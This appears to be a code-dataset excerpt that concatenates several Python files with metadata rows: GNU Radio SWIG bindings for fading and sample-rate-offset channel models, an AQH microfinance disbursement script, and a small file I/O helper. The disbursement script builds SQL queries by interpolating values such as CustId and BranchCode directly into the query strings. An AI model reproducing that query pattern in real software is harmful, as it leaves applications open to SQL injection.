""" return _channels_swig.selective_fading_model_sptr_make(self, *args, **kwargs) def fDTs(self): """fDTs(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_fDTs(self) def K(self): """K(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_K(self) def step(self): """step(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_step(self) def set_fDTs(self, *args, **kwargs): """set_fDTs(selective_fading_model_sptr self, float fDTs)""" return _channels_swig.selective_fading_model_sptr_set_fDTs(self, *args, **kwargs) def set_K(self, *args, **kwargs): """set_K(selective_fading_model_sptr self, float K)""" return _channels_swig.selective_fading_model_sptr_set_K(self, *args, **kwargs) def set_step(self, *args, **kwargs): """set_step(selective_fading_model_sptr self, float step)""" return _channels_swig.selective_fading_model_sptr_set_step(self, *args, **kwargs) def history(self): """history(selective_fading_model_sptr self) -> unsigned int""" return _channels_swig.selective_fading_model_sptr_history(self) def declare_sample_delay(self, *args): """ declare_sample_delay(selective_fading_model_sptr self, int which, int delay) declare_sample_delay(selective_fading_model_sptr self, unsigned int delay) """ return _channels_swig.selective_fading_model_sptr_declare_sample_delay(self, *args) def sample_delay(self, *args, **kwargs): """sample_delay(selective_fading_model_sptr self, int which) -> unsigned int""" return _channels_swig.selective_fading_model_sptr_sample_delay(self, *args, **kwargs) def output_multiple(self): """output_multiple(selective_fading_model_sptr self) -> int""" return _channels_swig.selective_fading_model_sptr_output_multiple(self) def relative_rate(self): """relative_rate(selective_fading_model_sptr self) -> double""" return _channels_swig.selective_fading_model_sptr_relative_rate(self) def start(self): """start(selective_fading_model_sptr self) -> bool""" return _channels_swig.selective_fading_model_sptr_start(self) def stop(self): """stop(selective_fading_model_sptr self) -> bool""" return _channels_swig.selective_fading_model_sptr_stop(self) def nitems_read(self, *args, **kwargs): """nitems_read(selective_fading_model_sptr self, unsigned int which_input) -> uint64_t""" return _channels_swig.selective_fading_model_sptr_nitems_read(self, *args, **kwargs) def nitems_written(self, *args, **kwargs): """nitems_written(selective_fading_model_sptr self, unsigned int which_output) -> uint64_t""" return _channels_swig.selective_fading_model_sptr_nitems_written(self, *args, **kwargs) def max_noutput_items(self): """max_noutput_items(selective_fading_model_sptr self) -> int""" return _channels_swig.selective_fading_model_sptr_max_noutput_items(self) def set_max_noutput_items(self, *args, **kwargs): """set_max_noutput_items(selective_fading_model_sptr self, int m)""" return _channels_swig.selective_fading_model_sptr_set_max_noutput_items(self, *args, **kwargs) def unset_max_noutput_items(self): """unset_max_noutput_items(selective_fading_model_sptr self)""" return _channels_swig.selective_fading_model_sptr_unset_max_noutput_items(self) def is_set_max_noutput_items(self): """is_set_max_noutput_items(selective_fading_model_sptr self) -> bool""" return _channels_swig.selective_fading_model_sptr_is_set_max_noutput_items(self) def set_min_noutput_items(self, *args, **kwargs): """set_min_noutput_items(selective_fading_model_sptr self, int m)""" return 
_channels_swig.selective_fading_model_sptr_set_min_noutput_items(self, *args, **kwargs) def min_noutput_items(self): """min_noutput_items(selective_fading_model_sptr self) -> int""" return _channels_swig.selective_fading_model_sptr_min_noutput_items(self) def max_output_buffer(self, *args, **kwargs): """max_output_buffer(selective_fading_model_sptr self, int i) -> long""" return _channels_swig.selective_fading_model_sptr_max_output_buffer(self, *args, **kwargs) def set_max_output_buffer(self, *args): """ set_max_output_buffer(selective_fading_model_sptr self, long max_output_buffer) set_max_output_buffer(selective_fading_model_sptr self, int port, long max_output_buffer) """ return _channels_swig.selective_fading_model_sptr_set_max_output_buffer(self, *args) def min_output_buffer(self, *args, **kwargs): """min_output_buffer(selective_fading_model_sptr self, int i) -> long""" return _channels_swig.selective_fading_model_sptr_min_output_buffer(self, *args, **kwargs) def set_min_output_buffer(self, *args): """ set_min_output_buffer(selective_fading_model_sptr self, long min_output_buffer) set_min_output_buffer(selective_fading_model_sptr self, int port, long min_output_buffer) """ return _channels_swig.selective_fading_model_sptr_set_min_output_buffer(self, *args) def pc_noutput_items(self): """pc_noutput_items(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_noutput_items(self) def pc_noutput_items_avg(self): """pc_noutput_items_avg(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_noutput_items_avg(self) def pc_noutput_items_var(self): """pc_noutput_items_var(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_noutput_items_var(self) def pc_nproduced(self): """pc_nproduced(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_nproduced(self) def pc_nproduced_avg(self): """pc_nproduced_avg(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_nproduced_avg(self) def pc_nproduced_var(self): """pc_nproduced_var(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_nproduced_var(self) def pc_input_buffers_full(self, *args): """ pc_input_buffers_full(selective_fading_model_sptr self, int which) -> float pc_input_buffers_full(selective_fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.selective_fading_model_sptr_pc_input_buffers_full(self, *args) def pc_input_buffers_full_avg(self, *args): """ pc_input_buffers_full_avg(selective_fading_model_sptr self, int which) -> float pc_input_buffers_full_avg(selective_fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.selective_fading_model_sptr_pc_input_buffers_full_avg(self, *args) def pc_input_buffers_full_var(self, *args): """ pc_input_buffers_full_var(selective_fading_model_sptr self, int which) -> float pc_input_buffers_full_var(selective_fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.selective_fading_model_sptr_pc_input_buffers_full_var(self, *args) def pc_output_buffers_full(self, *args): """ pc_output_buffers_full(selective_fading_model_sptr self, int which) -> float pc_output_buffers_full(selective_fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.selective_fading_model_sptr_pc_output_buffers_full(self, *args) def pc_output_buffers_full_avg(self, *args): """ 
pc_output_buffers_full_avg(selective_fading_model_sptr self, int which) -> float pc_output_buffers_full_avg(selective_fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.selective_fading_model_sptr_pc_output_buffers_full_avg(self, *args) def pc_output_buffers_full_var(self, *args): """ pc_output_buffers_full_var(selective_fading_model_sptr self, int which) -> float pc_output_buffers_full_var(selective_fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.selective_fading_model_sptr_pc_output_buffers_full_var(self, *args) def pc_work_time(self): """pc_work_time(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_work_time(self) def pc_work_time_avg(self): """pc_work_time_avg(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_work_time_avg(self) def pc_work_time_var(self): """pc_work_time_var(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_work_time_var(self) def pc_work_time_total(self): """pc_work_time_total(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_work_time_total(self) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(selective_fading_model_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.selective_fading_model_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(selective_fading_model_sptr self)""" return _channels_swig.selective_fading_model_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(selective_fading_model_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.selective_fading_model_sptr_processor_affinity(self) def active_thread_priority(self): """active_thread_priority(selective_fading_model_sptr self) -> int""" return _channels_swig.selective_fading_model_sptr_active_thread_priority(self) def thread_priority(self): """thread_priority(selective_fading_model_sptr self) -> int""" return _channels_swig.selective_fading_model_sptr_thread_priority(self) def set_thread_priority(self, *args, **kwargs): """set_thread_priority(selective_fading_model_sptr self, int priority) -> int""" return _channels_swig.selective_fading_model_sptr_set_thread_priority(self, *args, **kwargs) def name(self): """name(selective_fading_model_sptr self) -> std::string""" return _channels_swig.selective_fading_model_sptr_name(self) def symbol_name(self): """symbol_name(selective_fading_model_sptr self) -> std::string""" return _channels_swig.selective_fading_model_sptr_symbol_name(self) def input_signature(self): """input_signature(selective_fading_model_sptr self) -> io_signature_sptr""" return _channels_swig.selective_fading_model_sptr_input_signature(self) def output_signature(self): """output_signature(selective_fading_model_sptr self) -> io_signature_sptr""" return _channels_swig.selective_fading_model_sptr_output_signature(self) def unique_id(self): """unique_id(selective_fading_model_sptr self) -> long""" return _channels_swig.selective_fading_model_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(selective_fading_model_sptr self) -> basic_block_sptr""" return _channels_swig.selective_fading_model_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(selective_fading_model_sptr self, int ninputs, int noutputs) -> bool""" return 
_channels_swig.selective_fading_model_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(selective_fading_model_sptr self) -> std::string""" return _channels_swig.selective_fading_model_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(selective_fading_model_sptr self, std::string name)""" return _channels_swig.selective_fading_model_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(selective_fading_model_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.selective_fading_model_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(selective_fading_model_sptr self) -> swig_int_ptr""" return _channels_swig.selective_fading_model_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(selective_fading_model_sptr self) -> swig_int_ptr""" return _channels_swig.selective_fading_model_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(selective_fading_model_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.selective_fading_model_sptr_message_subscribers(self, *args, **kwargs) selective_fading_model_sptr_swigregister = _channels_swig.selective_fading_model_sptr_swigregister selective_fading_model_sptr_swigregister(selective_fading_model_sptr) selective_fading_model_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) selective_fading_model = selective_fading_model.make; class sro_model_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::sro_model)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::sro_model)> self) -> sro_model_sptr __init__(boost::shared_ptr<(gr::channels::sro_model)> self, sro_model p) -> sro_model_sptr """ this = _channels_swig.new_sro_model_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(sro_model_sptr self) -> sro_model""" return _channels_swig.sro_model_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_sro_model_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(sro_model_sptr self, double sample_rate_hz, double std_dev_hz, double max_dev_hz, double noise_seed=0) -> sro_model_sptr Sample Rate Offset Model. This block implements a model that varies sample rate offset with respect to time by performing a random walk on the interpolation rate. Constructor Specific Documentation: Build the sample rate offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum sample rate deviation from zero in Hz. noise_seed : A random number generator seed for the noise source. 
""" return _channels_swig.sro_model_sptr_make(self, *args, **kwargs) def set_std_dev(self, *args, **kwargs): """set_std_dev(sro_model_sptr self, double _dev)""" return _channels_swig.sro_model_sptr_set_std_dev(self, *args, **kwargs) def set_max_dev(self, *args, **kwargs): """set_max_dev(sro_model_sptr self, double _dev)""" return _channels_swig.sro_model_sptr_set_max_dev(self, *args, **kwargs) def set_samp_rate(self, *args, **kwargs): """set_samp_rate(sro_model_sptr self, double _rate)""" return _channels_swig.sro_model_sptr_set_samp_rate(self, *args, **kwargs) def std_dev(self): """std_dev(sro_model_sptr self) -> double""" return _channels_swig.sro_model_sptr_std_dev(self) def max_dev(self): """max_dev(sro_model_sptr self) -> double""" return _channels_swig.sro_model_sptr_max_dev(self) def samp_rate(self): """samp_rate(sro_model_sptr self) -> double""" return _channels_swig.sro_model_sptr_samp_rate(self) def history(self): """history(sro_model_sptr self) -> unsigned int""" return _channels_swig.sro_model_sptr_history(self) def declare_sample_delay(self, *args): """ declare_sample_delay(sro_model_sptr self, int which, int delay) declare_sample_delay(sro_model_sptr self, unsigned int delay) """ return _channels_swig.sro_model_sptr_declare_sample_delay(self, *args) def sample_delay(self, *args, **kwargs): """sample_delay(sro_model_sptr self, int which) -> unsigned int""" return _channels_swig.sro_model_sptr_sample_delay(self, *args, **kwargs) def output_multiple(self): """output_multiple(sro_model_sptr self) -> int""" return _channels_swig.sro_model_sptr_output_multiple(self) def relative_rate(self): """relative_rate(sro_model_sptr self) -> double""" return _channels_swig.sro_model_sptr_relative_rate(self) def start(self): """start(sro_model_sptr self) -> bool""" return _channels_swig.sro_model_sptr_start(self) def stop(self): """stop(sro_model_sptr self) -> bool""" return _channels_swig.sro_model_sptr_stop(self) def nitems_read(self, *args, **kwargs): """nitems_read(sro_model_sptr self, unsigned int which_input) -> uint64_t""" return _channels_swig.sro_model_sptr_nitems_read(self, *args, **kwargs) def nitems_written(self, *args, **kwargs): """nitems_written(sro_model_sptr self, unsigned int which_output) -> uint64_t""" return _channels_swig.sro_model_sptr_nitems_written(self, *args, **kwargs) def max_noutput_items(self): """max_noutput_items(sro_model_sptr self) -> int""" return _channels_swig.sro_model_sptr_max_noutput_items(self) def set_max_noutput_items(self, *args, **kwargs): """set_max_noutput_items(sro_model_sptr self, int m)""" return _channels_swig.sro_model_sptr_set_max_noutput_items(self, *args, **kwargs) def unset_max_noutput_items(self): """unset_max_noutput_items(sro_model_sptr self)""" return _channels_swig.sro_model_sptr_unset_max_noutput_items(self) def is_set_max_noutput_items(self): """is_set_max_noutput_items(sro_model_sptr self) -> bool""" return _channels_swig.sro_model_sptr_is_set_max_noutput_items(self) def set_min_noutput_items(self, *args, **kwargs): """set_min_noutput_items(sro_model_sptr self, int m)""" return _channels_swig.sro_model_sptr_set_min_noutput_items(self, *args, **kwargs) def min_noutput_items(self): """min_noutput_items(sro_model_sptr self) -> int""" return _channels_swig.sro_model_sptr_min_noutput_items(self) def max_output_buffer(self, *args, **kwargs): """max_output_buffer(sro_model_sptr self, int i) -> long""" return _channels_swig.sro_model_sptr_max_output_buffer(self, *args, **kwargs) def set_max_output_buffer(self, *args): """ 
set_max_output_buffer(sro_model_sptr self, long max_output_buffer) set_max_output_buffer(sro_model_sptr self, int port, long max_output_buffer) """ return _channels_swig.sro_model_sptr_set_max_output_buffer(self, *args) def min_output_buffer(self, *args, **kwargs): """min_output_buffer(sro_model_sptr self, int i) -> long""" return _channels_swig.sro_model_sptr_min_output_buffer(self, *args, **kwargs) def set_min_output_buffer(self, *args): """ set_min_output_buffer(sro_model_sptr self, long min_output_buffer) set_min_output_buffer(sro_model_sptr self, int port, long min_output_buffer) """ return _channels_swig.sro_model_sptr_set_min_output_buffer(self, *args) def pc_noutput_items(self): """pc_noutput_items(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_noutput_items(self) def pc_noutput_items_avg(self): """pc_noutput_items_avg(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_noutput_items_avg(self) def pc_noutput_items_var(self): """pc_noutput_items_var(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_noutput_items_var(self) def pc_nproduced(self): """pc_nproduced(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_nproduced(self) def pc_nproduced_avg(self): """pc_nproduced_avg(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_nproduced_avg(self) def pc_nproduced_var(self): """pc_nproduced_var(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_nproduced_var(self) def pc_input_buffers_full(self, *args): """ pc_input_buffers_full(sro_model_sptr self, int which) -> float pc_input_buffers_full(sro_model_sptr self) -> pmt_vector_float """ return _channels_swig.sro_model_sptr_pc_input_buffers_full(self, *args) def pc_input_buffers_full_avg(self, *args): """ pc_input_buffers_full_avg(sro_model_sptr self, int which) -> float pc_input_buffers_full_avg(sro_model_sptr self) -> pmt_vector_float """ return _channels_swig.sro_model_sptr_pc_input_buffers_full_avg(self, *args) def pc_input_buffers_full_var(self, *args): """ pc_input_buffers_full_var(sro_model_sptr self, int which) -> float pc_input_buffers_full_var(sro_model_sptr self) -> pmt_vector_float """ return _channels_swig.sro_model_sptr_pc_input_buffers_full_var(self, *args) def pc_output_buffers_full(self, *args): """ pc_output_buffers_full(sro_model_sptr self, int which) -> float pc_output_buffers_full(sro_model_sptr self) -> pmt_vector_float """ return _channels_swig.sro_model_sptr_pc_output_buffers_full(self, *args) def pc_output_buffers_full_avg(self, *args): """ pc_output_buffers_full_avg(sro_model_sptr self, int which) -> float pc_output_buffers_full_avg(sro_model_sptr self) -> pmt_vector_float """ return _channels_swig.sro_model_sptr_pc_output_buffers_full_avg(self, *args) def pc_output_buffers_full_var(self, *args): """ pc_output_buffers_full_var(sro_model_sptr self, int which) -> float pc_output_buffers_full_var(sro_model_sptr self) -> pmt_vector_float """ return _channels_swig.sro_model_sptr_pc_output_buffers_full_var(self, *args) def pc_work_time(self): """pc_work_time(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_work_time(self) def pc_work_time_avg(self): """pc_work_time_avg(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_work_time_avg(self) def pc_work_time_var(self): """pc_work_time_var(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_work_time_var(self) def pc_work_time_total(self): 
"""pc_work_time_total(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_work_time_total(self) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(sro_model_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.sro_model_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(sro_model_sptr self)""" return _channels_swig.sro_model_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(sro_model_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.sro_model_sptr_processor_affinity(self) def active_thread_priority(self): """active_thread_priority(sro_model_sptr self) -> int""" return _channels_swig.sro_model_sptr_active_thread_priority(self) def thread_priority(self): """thread_priority(sro_model_sptr self) -> int""" return _channels_swig.sro_model_sptr_thread_priority(self) def set_thread_priority(self, *args, **kwargs): """set_thread_priority(sro_model_sptr self, int priority) -> int""" return _channels_swig.sro_model_sptr_set_thread_priority(self, *args, **kwargs) def name(self): """name(sro_model_sptr self) -> std::string""" return _channels_swig.sro_model_sptr_name(self) def symbol_name(self): """symbol_name(sro_model_sptr self) -> std::string""" return _channels_swig.sro_model_sptr_symbol_name(self) def input_signature(self): """input_signature(sro_model_sptr self) -> io_signature_sptr""" return _channels_swig.sro_model_sptr_input_signature(self) def output_signature(self): """output_signature(sro_model_sptr self) -> io_signature_sptr""" return _channels_swig.sro_model_sptr_output_signature(self) def unique_id(self): """unique_id(sro_model_sptr self) -> long""" return _channels_swig.sro_model_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(sro_model_sptr self) -> basic_block_sptr""" return _channels_swig.sro_model_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(sro_model_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.sro_model_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(sro_model_sptr self) -> std::string""" return _channels_swig.sro_model_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(sro_model_sptr self, std::string name)""" return _channels_swig.sro_model_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(sro_model_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.sro_model_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(sro_model_sptr self) -> swig_int_ptr""" return _channels_swig.sro_model_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(sro_model_sptr self) -> swig_int_ptr""" return _channels_swig.sro_model_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(sro_model_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.sro_model_sptr_message_subscribers(self, *args, **kwargs) sro_model_sptr_swigregister = _channels_swig.sro_model_sptr_swigregister sro_model_sptr_swigregister(sro_model_sptr) sro_model_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) sro_model = sro_model.make;
UTF-8
Python
false
false
2,014
2,267,742,778,828
73bc75f31b2f3c7744b9c20cc04853dece4ff286
9b1823b73a03f7517c2039ccdb3889300bacf455
/dialogs/AQH/fDroppingDanaAQH_data.py
60560242589757204a65140768a83754a66f5fe5
[]
no_license
ihsansolusi/BMMProgram
https://github.com/ihsansolusi/BMMProgram
d50eb6807abad265544a6c855888e6d9cef3a864
97428d5cf3f61256a8bc1ced551da611a8884b50
refs/heads/master
2016-03-31T02:51:25.931005
2013-09-12T23:38:15
2013-09-12T23:38:15
2,272,273
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import com.ihsan.foundation.pobjecthelper as phelper import time, sys, os def FormSetDataEx(uideflist, parameter): config =uideflist.config helper = phelper.PObjectHelper(config) if parameter.DatasetCount != 0: CustomerId=parameter.FirstRecord.CustId Cust ="PObj:CustomerPersonal#CustomerId=%s" % CustomerId uideflist.SetData('uipart', Cust) key=parameter.FirstRecord.key uideflist.SetData('uipropose', key) def OnSetData(sender): config =sender.UIDefList.config helper = phelper.PObjectHelper(config) Data = sender.ActiveRecord CustId = Data.CustomerId sSQL = "select b.*,branchname from branch a, mustahiqaqh b, mustahiq c " sSQL += "where a.branchcode=b.branchcode and b.mustahiqid=c.mustahiqid and c.customerid = %s" % CustId cabang = config.CreateSQL(sSQL).rawresult Data.DepositBalance = cabang.DepositBalance Data.SetFieldByName('LBranch.BranchCode', cabang.BranchCode) Data.SetFieldByName('LBranch.BranchName', cabang.BranchName) Data.StatusKaryawan = cabang.employeestatus Data.Jabatan = cabang.position Data.CoupleName = cabang.CoupleName Data.CoupleJob = cabang.CoupleJob Data.MustahiqId = cabang.MustahiqId cSQL = "select b.accountno,c.accountname,b.realbalance,c.balance, a.*,d.* from programaqh a, productaccount b, transactionaccount c, product d " cSQL += "WHERE a.productid=b.productid and a.productid=d.productid and b.accountno=c.accountno and a.branchcode='%s'" % cabang.BranchCode plafond = config.CreateSQL(cSQL).rawresult Data.accountno = plafond.accountno Data.accountname = plafond.accountname uip = sender.uideflist.uiprogram rec = uip.Dataset.AddRecord() rec.ProductName =plafond.productname rec.MaxPlafond =plafond.MaxPlafond rec.MaxDropping =plafond.MaxDropping rec.SisaPlafond =plafond.balance rec.Saldo =plafond.realbalance def Simpan(config, parameter, returnpacket): status = returnpacket.CreateValues( ['IsErr',0], ['ErrMessage',''], ) recParam = parameter.uipart.GetRecord(0) rec = parameter.uipropose.GetRecord(0) Cabang =recParam.GetFieldByName('LBranch.BranchCode') UserLogin = config.SecurityContext.InitUser TerminalUser = config.SecurityContext.InitIP config.BeginTransaction() param = {'tipe':'AQH'} param2 = {'tipe':'T.AQH.'} try: helper = phelper.PObjectHelper(config) simpanPengajuan = helper.GetObject('AQHPropose',rec.AQHProposeId) simpanPengajuan.ProposeStatus =rec.Status simpanPengajuan.Description =rec.alasan if rec.Status == 'R': pSQL = "select a.productid,accountno,c.productname from programaqh a, productaccount b, product c " pSQL += "where a.productid=c.productid and a.productid=b.productid and branchcode='%s'" % Cabang Prog = config.CreateSQL(pSQL).rawresult if Prog.accountno in (None,''): raise '','Program belum mempunyai rekening program..' 
sSQL = "select productid,status from mustahiqproduct where mustahiqid= %s " % rec.MustahiqId MP = config.CreateSQL(sSQL).rawresult if MP.productid in (None,0): simpanMP = helper.CreatePObject('MustahiqProduct',param) simpanMP.ProductId = Prog.productid simpanMP.MustahiqId = rec.MustahiqId simpanMP.MustahiqExtField = Cabang simpanMP.Status = 'A' productid = Prog.productid else: if MP.status =='A': raise '','Pemohon AQH '+recParam.CustomerName+' Masih memiliki kartu yang masih aktif' simpanMP = helper.GetObject('MustahiqProduct', (MP.productid,rec.MustahiqId)) if simpanMP.productid != Prog.productid: simpanMP = helper.CreatePObject('MustahiqProduct',param) simpanMP.ProductId = Prog.productid simpanMP.MustahiqId = rec.MustahiqId simpanMP.MustahiqExtField = Cabang simpanMP.Status = 'A' productid = simpanMP.productid oAccount = helper.CreatePObject('FinancingAccount') oAccount.AccountNo = '%s-%d' % (rec.AccountNo,rec.AQHProposeId) oAccount.AccountName = recParam.CustomerName oAccount.AccountStatus = 'O' oAccount.BaseAmount = rec.ProposePlafond oAccount.BaseBalance = rec.ProposePlafond oAccount.MustahiqId = rec.MustahiqId oAccount.ProductId = productid oAccount.Balance = rec.ProposePlafond oAccount.Currency_Code = '001' oAccount.DateCreated = rec.SIDate oAccount.Description = 'Rekening Cicilan' oAccount.OpenDate = rec.ProposeDate oAccount.TerminalCreated = TerminalUser oAccount.UserCreated = UserLogin oAccount.CyclePeriodCount = 0 oAccount.RealPeriodCount = 0 oAccount.CollectibiltiyLevel = 1 oAccount.InstallmentBalance = 0 oAccount.DebtArrears = 0 oAccount.BranchCode = Cabang oAccount.InstallmentAmount = rec.Installment oAccount.PeriodCount = rec.PaybackPeriod oAccount.PeriodUnit = 'M' Rek = helper.GetObject('ProductAccount',Prog.accountno) if Rek.RealBalance < rec.ProposePlafond : raise '','Plafond program tidak cukup untuk plafond pengajuan' Rek.Balance -= rec.ProposePlafond Rek.RealBalance -= rec.ProposePlafond trans = helper.CreatePObject('Transaction', param2) trans.InputDate = int(config.Now()) trans.TransactionDate = rec.ProposeDate trans.Description = 'Dropping ke rekening '+recParam.CustomerName trans.IsAuthorized = 'T' trans.Inputer = UserLogin trans.BranchCode = Cabang PTItem = helper.CreatePObject('ProductTransactionItem') PTItem.TransactionId = trans.TransactionId PTItem.MutationType = 'C' PTItem.Amount = rec.ProposePlafond PTItem.Rate = 1.0 PTItem.EkuivalenAmount = rec.ProposePlafond*1.0 PTItem.CurrencyCode = '001' PTItem.Description = 'Dropping ke rekening '+recParam.CustomerName PTItem.AccountNo = Prog.accountno PTItem.BranchCode = Cabang # Droping ke rekening peserta ftItem = helper.CreatePObject('FinancingTransactionItem') ftItem.TransactionId = trans.TransactionId ftItem.MutationType = 'D' ftItem.Amount = rec.ProposePlafond ftItem.Rate = 1.0 ftItem.EkuivalenAmount = rec.ProposePlafond*1.0 ftItem.CurrencyCode = '001' ftItem.Description = 'Dropping dari rekening program '+Prog.productname ftItem.AccountNo = oAccount.AccountNo ftItem.BranchCode = Cabang if recParam.DepositBalance > 0 : # Angsuran Dari Deposit ftItem2 = helper.CreatePObject('FinancingTransactionItem') ftItem2.TransactionId = trans.TransactionId ftItem2.MutationType = 'C' ftItem2.Amount = recParam.DepositBalance ftItem2.Rate = 1.0 ftItem2.EkuivalenAmount = recParam.DepositBalance*1.0 ftItem2.CurrencyCode = '001' ftItem2.Description = 'Potongan dari saldo deposit ' ftItem2.AccountNo = oAccount.AccountNo ftItem2.BranchCode = Cabang oAccount.BaseBalance -= recParam.DepositBalance oAccount.InstallmentBalance += 
recParam.DepositBalance oAccount.CyclePeriodCount += 1 simpanAQH = helper.GetObject('MustahiqAQH', (rec.MustahiqId)) simpanAQH.DepositBalance = 0 PTItem2 = helper.CreatePObject('ProductTransactionItem') PTItem2.TransactionId = trans.TransactionId PTItem2.MutationType = 'D' PTItem2.Amount = recParam.DepositBalance PTItem2.Rate = 1.0 PTItem2.EkuivalenAmount = recParam.DepositBalance*1.0 PTItem2.CurrencyCode = '001' PTItem2.Description = 'Potongan dari saldo deposit peserta '+recParam.CustomerName PTItem2.AccountNo = Prog.accountno PTItem2.BranchCode = Cabang Rek.Balance += recParam.DepositBalance Rek.RealBalance += rec.ProposePlafond config.Commit() except: config.Rollback() status.IsErr = 1 status.ErrMessage = str(sys.exc_info()[1])
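Everything Simpan persists is wrapped in one begin/commit/rollback cycle, with failures reported through the return packet. A stripped-down sketch of just that skeleton; save_with_rollback and work are hypothetical names, and only the config and returnpacket calls mirror the code above:

import sys

def save_with_rollback(config, returnpacket, work):
    status = returnpacket.CreateValues(['IsErr', 0], ['ErrMessage', ''])
    config.BeginTransaction()
    try:
        work()              # hypothetical callable holding the domain-specific updates
        config.Commit()
    except:
        config.Rollback()
        status.IsErr = 1
        status.ErrMessage = str(sys.exc_info()[1])
    return status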
UTF-8
Python
false
false
2,013
8,254,927,156,980
1f57372d5ac33e7b8a2d15146571e483e28aab90
f557a70a97de5053a8b3e5a85bd48f0e54917911
/sourcecode/fileIO.py
9eb946bf862d4a1d7c8316a7efb06c813301fd3b
[]
no_license
Software-statistics/Statistics
https://github.com/Software-statistics/Statistics
0368fd9d0a1f2c33085e6ad00c47ba935e97d5ee
578692a2af8b054e3a4d24cebc72732909da93df
refs/heads/master
2021-01-19T05:36:00.672812
2014-06-08T07:44:17
2014-06-08T07:44:23
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#-*- coding:UTF-8 -*-
def fwrite(path, message):
    f = open(path, "w")
    f.write(message)
    f.close()   # the original omitted the parentheses, so the file was never actually closed

def fread(path):
    f = open(path, "r")
    for line in f:
        print line
    f.close()
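A short usage sketch for the two helpers above; the file name is illustrative:

fwrite("example.txt", "hello\nworld\n")
fread("example.txt")   # prints each line of the file just written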
UTF-8
Python
false
false
2,014
4,990,752,034,389
c7c22266035707ed7753a89ab177229053487fba
8bf66340269b0be1e94f47a1d3cf038cb2d80f55
/gr-dvbt/python/dvbt_source.py
070207526d41dd3ae0d8c13c68a35fc025fbf24f
[ "GPL-3.0-or-later", "GPL-1.0-or-later", "GPL-3.0-only" ]
